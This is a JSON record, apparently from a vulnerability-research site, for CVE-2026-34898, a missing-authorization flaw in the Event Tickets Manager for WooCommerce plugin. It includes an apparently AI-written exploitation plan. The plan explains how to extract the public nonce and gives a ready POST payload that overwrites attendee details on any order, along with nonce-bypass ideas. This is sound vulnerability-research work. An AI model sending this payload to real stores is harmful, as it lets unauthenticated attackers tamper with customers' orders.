[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fnd9TKFTFn5QrV3bJ4WJE2P9rkxmO77o8I9sjjfQoa_g":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":35},"CVE-2026-34898","event-tickets-manager-for-woocommerce-missing-authorization","Event Tickets Manager for WooCommerce \u003C= 1.5.3 - Missing Authorization","The Event Tickets Manager for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.","event-tickets-manager-for-woocommerce",null,"\u003C=1.5.3","1.5.4","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-07 00:00:00","2026-04-15 19:47:38",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7e4fe5a4-a025-43e6-9aa0-01ee9dfd2a43?source=api-prod",9,[22,23,24,25,26,27],"README.txt","event-tickets-manager-for-woocommerce.php","public\u002Fclass-event-tickets-manager-for-woocommerce-public.php","public\u002Fsrc\u002Fjs\u002Fevent-tickets-manager-for-woocommerce-public.js","public\u002Fsrc\u002Fscss\u002Fevent-tickets-manager-for-woocommerce-public.css","templates\u002Ffrontend\u002Fevent-tickets-manager-for-woocommerce-before-atc-html.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-34898\n\n## 1. Vulnerability Summary\nThe **Event Tickets Manager for WooCommerce** plugin (\u003C= 1.5.3) suffers from a **Missing Authorization** vulnerability. The AJAX handler for `wps_etmfw_edit_user_info` fails to perform capability checks or verify order ownership. This allows an unauthenticated attacker to modify attendee\u002Fticket information for any WooCommerce order by providing the target `order_id`.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `wps_etmfw_edit_user_info`\n*   **Method:** POST\n*   **Authentication:** None required (registered via `wp_ajax_nopriv_`).\n*   **Vulnerable Parameters:** \n    *   `order_id`: The ID of the WooCommerce order to modify.\n    *   `form_value`: An object\u002Farray containing the ticket fields to overwrite (e.g., Name, Email).\n*   **Preconditions:** \n    *   The attacker needs a valid `order_id` (can be enumerated).\n    *   A valid public nonce is required.\n\n## 3. Code Flow\n1.  **Registration:** The plugin (likely in `Event_Tickets_Manager_For_Woocommerce_Public`) registers `wp_ajax_nopriv_wps_etmfw_edit_user_info`.\n2.  **Trigger:** The frontend script `public\u002Fsrc\u002Fjs\u002Fevent-tickets-manager-for-woocommerce-public.js` listens for a click on `#wps_etmfw_save_edit_ticket_info_btn`.\n3.  **Data Collection:** It scrapes values from elements with the class `.wps-edit-form-group` and stores them in `modifiedValues`.\n4.  **AJAX Call:** It sends a POST request to `admin-ajax.php` with `action: 'wps_etmfw_edit_user_info'`, `form_value: modifiedValues`, and `order_id`.\n5.  **Vulnerable Sink:** The PHP handler (inferred) verifies the nonce `wps_nonce` using `wp_verify_nonce( $_POST['wps_nonce'], 'wps-etmfw-verify-public-nonce' )`. However, it fails to check if the current user has permission to edit the specified `order_id` before updating the order's metadata\u002Fattendee details.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is localized for the public script and is available on any WooCommerce product page.\n\n1.  **Identify Trigger:** The script `event-tickets-manager-for-woocommerce-public.js` is enqueued on single product pages via `etmfw_public_enqueue_scripts()`.\n2.  **Action:** Navigate to a product page.\n3.  **Extraction:** Use `browser_eval` to extract the nonce from the `etmfw_public_param` object.\n    *   **JS Variable:** `window.etmfw_public_param`\n    *   **Nonce Key:** `wps_etmfw_public_nonce`\n    *   **Nonce Action:** `wps-etmfw-verify-public-nonce`\n\n## 5. Exploitation Strategy\n1.  **Setup:** Create a dummy event product and a target order.\n2.  **Nonce Extraction:** Navigate to the product page and extract the nonce using `browser_eval`.\n3.  **Malicious Request:** Use `http_request` to send a POST payload to `admin-ajax.php`.\n\n**Payload Example:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=wps_etmfw_edit_user_info&order_id=TARGET_ORDER_ID&wps_nonce=EXTRACTED_NONCE&form_value[Name]=Hacked_User&form_value[Email]=attacker@example.com\n```\n\n## 6. Test Data Setup\n1.  **Activate Plugin:** Ensure `event-tickets-manager-for-woocommerce` is active.\n2.  **Create Product:**\n    ```bash\n    wp post create --post_type=product --post_title=\"Event Ticket\" --post_status=publish\n    # Product ID will be needed for the nonce extraction page\n    ```\n3.  **Configure Product:** Set the product as an event.\n    ```bash\n    wp post meta set \u003CPRODUCT_ID> _virtual yes\n    wp post meta set \u003CPRODUCT_ID> _ticket yes # (inferred meta key)\n    ```\n4.  **Create Target Order:** Create a WooCommerce order as a standard \"Customer\" user.\n    ```bash\n    wp wc order create --user=customer_user --status=processing --item_id=\u003CPRODUCT_ID>\n    # Note the resulting ORDER_ID\n    ```\n\n## 7. Expected Results\n*   The AJAX response should be a JSON object (likely `{\"success\": true}` or similar).\n*   The order metadata associated with the ticket (attendee name\u002Femail) should be updated to the values provided in `form_value`.\n\n## 8. Verification Steps\n1.  **Check Order Meta:** After the exploit, verify the order metadata via WP-CLI:\n    ```bash\n    wp post meta list \u003CTARGET_ORDER_ID>\n    ```\n2.  **Inspect Attendee Data:** Look for keys like `wps_etmfw_attendee_fields` or similar (grounded in the plugin's meta naming convention) to see if \"Hacked_User\" is present.\n\n## 9. Alternative Approaches\nIf `order_id` ownership is partially checked, try:\n*   **Parameter Pollution:** If the code uses `$_REQUEST['order_id']` vs `$_POST['order_id']`.\n*   **Empty Nonce:** Check if the nonce verification is conditional (e.g., `if (isset($_POST['wps_nonce'])) { wp_verify_nonce(...) }`).\n*   **Default Nonce:** If the localized nonce fails, try the default action nonce `-1`.","gemini-3-flash-preview","2026-04-17 21:11:25","2026-04-17 21:11:57",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","1.5.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fevent-tickets-manager-for-woocommerce\u002Ftags\u002F1.5.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fevent-tickets-manager-for-woocommerce.1.5.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fevent-tickets-manager-for-woocommerce\u002Ftags\u002F1.5.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fevent-tickets-manager-for-woocommerce.1.5.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fevent-tickets-manager-for-woocommerce\u002Ftags"]